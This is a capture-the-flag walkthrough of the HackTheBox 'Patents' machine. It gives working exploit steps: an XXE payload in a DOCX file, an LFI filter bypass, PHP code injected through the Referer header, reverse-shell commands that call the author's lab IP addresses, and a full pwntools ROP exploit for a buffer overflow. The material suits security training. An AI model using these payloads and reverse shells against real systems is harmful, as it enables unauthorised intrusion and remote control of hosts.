HackTheBox. Patents walkthrough. XXE via DOCX, LFI to RCE, Git, and ROP chains

I continue publishing solutions for machines from the HackTheBox site.

In this article, we exploit XXE in a service that converts DOCX documents to PDF, get RCE via LFI, dig into the Git history and restore files, build ROP chains with pwntools, and find a hidden root file.

The lab is reached over VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, since you end up in a private network with people who know a thing or two about information security :)

Recon

This machine has the IP address 10.10.10.173, which I add to /etc/hosts.

10.10.10.173    patents.htb

First, we scan open ports. Since it takes a long time to scan all the ports with nmap, I will first do this with masscan. We scan all TCP and UDP ports from the tun0 interface at a speed of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.173 --rate=500

Now, for more detailed information about the services that operate on ports, we will run a scan with the -A option.

nmap -A patents.htb -p22,80,8888

The host runs SSH and the Apache web server, and port 8888 is used by an unidentified service. Let's look at the web site.

The site has an upload form for DOCX documents.

XXE DOCX

According to the description, our document will be converted to PDF, which suggests XXE. I took an existing example payload as a starting point.

In this example, the host tries to download an XML document from a remote server. After fetching it, the parser reads the local file named in that document, encodes it in base64, and contacts our server again, passing the encoded file as a request parameter. Decoding that parameter gives us the file from the remote machine.

However, this payload should not be placed in word/document.xml. Since the OpenXML SDK is used to work with this type of document, the server-side software looks for data both in word/document.xml and in customXML/item1.xml, so the payload should go into the latter.

Let's create a DOCX document and unzip it as a ZIP archive. Then create the customXML directory with an item1.xml file inside it, write the payload from the example into it with the IP address changed to our own, and zip the document back up.
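The repacking step can be sketched in Python as follows. This is a minimal sketch under assumptions: the payload is a generic external-DTD XXE payload, not necessarily the exact one used in the article, and the names add_custom_xml, ATTACKER, and the entity names are illustrative only. The part path follows the customXML/item1.xml location named above.

```python
import io
import zipfile

# Assumption: address of our own web server (replace with your VPN address).
ATTACKER = "10.10.14.211"

# Assumption: a generic out-of-band payload that pulls dtd.xml from our server.
ITEM1_XML = f"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://{ATTACKER}/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
"""


def add_custom_xml(docx_bytes: bytes, payload: str = ITEM1_XML) -> bytes:
    """Return a copy of the DOCX archive with customXML/item1.xml added."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == "customXML/item1.xml":
                continue  # an existing part is replaced by our payload below
            dst.writestr(info, src.read(info.filename))
        dst.writestr("customXML/item1.xml", payload)
    return out.getvalue()
```

A possible use is to read an ordinary document with open("template.docx", "rb"), pass its bytes to add_custom_xml, and write the result to file.docx (both file names are placeholders).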

Now run the local web server.

python3 -m http.server 80

In the current directory we create the second XML file (dtd.xml), specifying /etc/passwd as the file to read.

Then we upload the document to the server. In the window where the web server is running, we see the connection back to us.

Decoding the base64 gives us the requested file.
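The decoding step can be done with a few lines of Python. This is a sketch that assumes the encoded file arrives as the entire query string of the logged request (for example "/dtd.xml?cm9vd..."); the function name decode_exfil is hypothetical, and the log format may differ in practice.

```python
import base64
from urllib.parse import urlsplit, unquote


def decode_exfil(request_target: str) -> bytes:
    """Decode the base64 blob carried in the query string of a logged request."""
    query = unquote(urlsplit(request_target).query)
    # Restore padding in case it was stripped on the way.
    query += "=" * (-len(query) % 4)
    return base64.b64decode(query)
```

Copying the request path from the http.server log into decode_exfil and printing the result with .decode() shows the file contents.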

This way we can read files on the server. Let's read the Apache configuration files. To do this, change dtd.xml and upload the document again.

So we find out the directory in which the site is located. Let's try to read the configuration file.

The comment says the file was renamed because of a vulnerability. Naturally, we go to it: patents.htb/getPatent_alphav1.0.php.

If we open this page and pass the path ../../../../../etc/passwd as the id parameter, every occurrence of "../" is removed from our string. Let's replace each "../" with "....//", so that after the inner "../" is removed, a "../" still remains.
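Why this works can be seen by modelling the filter locally. The sketch below assumes the server makes a single, non-recursive replacement pass (as PHP's str_replace would); the function names are hypothetical and the real server code may differ.

```python
def strip_traversal(value: str) -> str:
    """Assumed model of the filter: one pass that deletes every '../'."""
    return value.replace("../", "")


def bypass(path: str) -> str:
    """Wrap each '../' so that one removal pass leaves a '../' behind."""
    return path.replace("../", "....//")


plain = "../../etc/passwd"
print(strip_traversal(plain))          # the traversal is removed
print(strip_traversal(bypass(plain)))  # the traversal survives the filter
```

The inner "../" of each "....//" is deleted, and the remaining ".." and "/" join into a new "../" that the single pass never revisits.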

This gives us LFI.

Entry point

Let's try to get RCE from this. Frankly, it was difficult. When we sent such a document, we were not offered a PDF to download. In other words, the output went to file descriptor 2 (stderr, used for diagnostic and debug messages in text form), and we can read that descriptor through the LFI. Let's encode the reverse shell in base64:

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.211/4321 0>&1;'

L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn
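The encoding step can be reproduced in Python. This is just a sketch of the same operation; the variable names are illustrative, and the command is the one shown above.

```python
import base64

# The reverse-shell command from the article (IP and port are the author's).
CMD = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.211/4321 0>&1;'"

encoded = base64.b64encode(CMD.encode()).decode()
print(encoded)

# Round trip: decoding must give back the original command.
assert base64.b64decode(encoded).decode() == CMD
```

Base64 keeps quotes, spaces, and the ampersand out of the HTTP header, so the command reaches the PHP code intact.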

The PHP code will decode it and pass it to the system function. We send this code in an HTTP header (Referer) when uploading a file.

curl http://patents.htb/convert.php -F "userfile=@file.docx" -F 'submit=Generate PDF' --referer 'http://test.com/<?php system(base64_decode("L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn")); ?>'

Run netcat.

nc -lvp 4321

Now let's request descriptor 2 through the LFI.

curl http://patents.htb/getPatent_alphav1.0.php?id=....//....//....//....//....//....//....//proc//self//fd//2

We receive the reverse connection.

ROOT 1

Upload the linPEAS enumeration script to the host and carefully analyze its output. It shows that we are working inside a Docker container.

We also find password hashes, but cracking them leads nowhere.

So we run pspy64 to monitor running processes, and we find a process started as root to which the password is passed as an environment variable.

We then switch user locally by entering this password.

ROOT 2

Let's see what this script does.

We get a hint about some lfmserver, and we also save the username and password. Let's search the system for everything related to lfm.

We find a Git repository in this directory.

Let's work with this repository.

Let's look at the history of changes. We see that an executable file and a description were added in the penultimate commit and deleted again in the last one. Let's roll back the deletion.

git revert 7c6609240f414a2cb8af00f75fdc7cfbf04755f5

The executable file and the description appear in our directory.

At this point I was about to start reversing the binary, but we have a Git project! I found a commit that mentions source code.

And let's restore the files.

git checkout 0ac7c940010ebb22f7fbedb67ecdf67540728123

After that we download the source files of interest, the program itself, and the libraries to the local machine.

Rop

We need to find and exploit a vulnerability in the program, and the source code will help. Let's check the protections of the binary.

The stack canary and PIE are absent, but the stack is not executable. Let's open the binary in any disassembler with a decompiler that you find convenient (I use IDA Pro 7.2) and compare the decompiled code with the source code from the repository.

To connect to the server, we use the data from the checker.py file together with the saved credentials.

Let's write an exploit template.

#!/usr/bin/python3

from pwn import *

context(os="linux", arch="amd64")
HOST = "127.0.0.1"
PORT = 8888
username = "lfmserver_user"
password = "!gby0l0r0ck$$!"

Now let's work out the request format. Launch the application.

We must send the path to a file and the hash of its contents. As an example, I took /etc/hosts.
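The hash can be computed locally with hashlib. This is a minimal sketch that assumes the server compares the MD5 of the raw file contents (the md5sum variable in the exploit suggests MD5); the helper name md5_of_file is hypothetical.

```python
import hashlib


def md5_of_file(path: str) -> str:
    """Return the hex MD5 digest of the file's raw bytes."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # Read in chunks so large files do not have to fit in memory.
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

For the request to pass, the hash must be taken from the server's copy of the file (or an identical copy), not from the local /etc/hosts.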

Add the following code to the template.

INPUTREQ = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n"
file = "/etc/hosts"
md5sum = "7d8fc74dc6cc8517a81a5b00b8b9ec32"
send_ = INPUTREQ.format(file,username, password, md5sum)

r = remote(HOST, PORT)
r.sendline(send_.encode())

r.interactive()

Now run it and get a 404 error.

Let's look at the log file.

It is clear where the application looks for the file, so let's play with the path and point it at our file.

file = "../../../../../etc/hosts"

We run the code and see no errors in the log.

And when the path is URL-encoded, we get a response with code 200 from the server!

file = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fhosts"
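The encoded path above can be generated instead of typed by hand. This sketch encodes only the dot and the slash, which is what the string in the article does; the function name encode_traversal is hypothetical.

```python
from urllib.parse import unquote


def encode_traversal(path: str) -> str:
    """Percent-encode only '.' and '/', leaving other characters untouched."""
    return path.replace(".", "%2E").replace("/", "%2F")


encoded = encode_traversal("../../../../../etc/hosts")
print(encoded)

# A URL decoder on the server side turns it back into the plain path.
assert unquote(encoded) == "../../../../../etc/hosts"
```

Note that urllib.parse.quote would not be enough here, because it leaves the dot unencoded.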

Great, let's get back to the disassembler. Among the strings (Shift + F12) we find the successful server response and look at where it is referenced (X).

We go to the first function, which begins with the credential check.

Let's rename the variables in the disassembler window to make the decompiled code easier to follow.

Analyzing lines 18-24 of the decompiled code shows the following: part of the user input goes into the function sub_402DB9, which writes a converted string into the variable name; name is then passed to access, and if the result is negative, a 404 message is returned. So name holds the path to the file. Since the request was processed even when URL-encoded, sub_402DB9 is most likely the URL decoder.

However, the variable name, which receives this data, has a limited size.

Thus, to overflow the buffer we need to send 0xA0 = 160 bytes. Let's add a function that pads the path to 160 bytes and URL-encodes it. Since the hash is computed from the file contents, the file path must stay valid, so we append a 0x00 byte right after the real path.

We also need to know the hash of some file on the server that is always available and never changes, for example /proc/sys/kernel/randomize_va_space. As we recall from the linPEAS output, ASLR is enabled, so we know the contents of this file and therefore its hash.

Then change the code.

#!/usr/bin/python3
from pwn import *

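def append_and_encode(file, rop=b""):
    # Terminate the real path with NUL, pad to 160 bytes (0xA0), then append the ROP chain
    path = (file + b"\x00").ljust(160, b"A") + rop
    # Percent-encode every byte so the server-side URL decoder restores the raw payload
    return b"".join(b"%%%02x" % i for i in path)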

context(os="linux", arch="amd64", log_level="error")

HOST = "127.0.0.1"
PORT = 8888
INPUTREQ = b"CHECK /{1} LFM\r\nUser=lfmserver_user\r\nPassword=!gby0l0r0ck$$!\r\n\r\n{2}\n"
md5sum = b"26ab0db90d72e28ad0ba1e22ee510510"

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space")
send_= INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)
r.interactive()

It works successfully!

Now let's use a memory leak to determine the address at which libc is loaded. To do this, we call write to send the GOT entry of dup2, which holds the address of dup2 in the loaded libc, to the socket descriptor (6).

binary = ELF("./lfmserver")
libc = ELF("./libc6.so")

rop_binary = ROP(binary)
rop_binary.write(0x6, binary.got['dup2'])
rop = flat(rop_binary.build())

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)

Now take the leaked address of dup2 (the first 8 bytes of the response) and subtract the offset of dup2 in the library file from it. This gives the base address of libc.
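The arithmetic can be checked offline with made-up numbers. In the sketch below both the leaked address and the dup2 offset are hypothetical values chosen for illustration, and struct stands in for the u64 helper from pwntools.

```python
import struct


def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Base address = runtime address of a symbol minus its offset in the file."""
    base = leaked_addr - symbol_offset
    # A shared library is mapped on a page boundary, so the low 12 bits are zero.
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or bad leak?")
    return base


# Hypothetical leak: 8 little-endian bytes as they would arrive from the socket.
raw = struct.pack("<Q", 0x7F12A4B10A40)
leak = struct.unpack("<Q", raw[:8])[0]

DUP2_OFFSET = 0x110A40  # hypothetical offset of dup2 inside the libc file
print(hex(libc_base(leak, DUP2_OFFSET)))
```

The page-alignment check is a cheap sanity test: if it fails, the local libc copy probably does not match the one on the server.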

print(f"[*] Payload sent")

recv_ = r.recvall().split(b'\r')
leak = u64(recv_[-1][:8])
print(f"[*] Leak address: {hex(leak)}")
libc.address = leak - libc.symbols['dup2']
print(f"[+] Libc base: {hex(libc.address)}")

Now find the address of the string /bin/sh.

shell_address = next(libc.search(b"/bin/sh\x00"))

It remains to build the ROP chain that redirects the standard I/O descriptors (0, 1, 2) to the socket descriptor opened by the program (we take 6). After that, the system function is called with the address of the string /bin/sh as its argument.

rop_libc = ROP(libc)
rop_libc.dup2(6,0)
rop_libc.dup2(6,1)
rop_libc.dup2(6,2)
rop_libc.system(shell_address)
rop = flat(rop_libc.build()) 

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)
send_ = INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)

context.log_level='info'
r.recv()
r.sendline(b"id")

Fine! We get a root shell, but it dies quickly. Start a listener (nc -lvp 8765) and send a reverse shell.

r.sendline(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.66",8765));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'')

And we have a stable shell. I give the full code in the picture below.

But we can’t read the root flag ...

ROOT 3

Running linPEAS and looking at the output, we find interesting partitions, especially /dev/sda2.

Let's get information about all the block devices.

So we have the root partition /dev/sda2. Create a directory and mount the partition.

So we find the root flag.
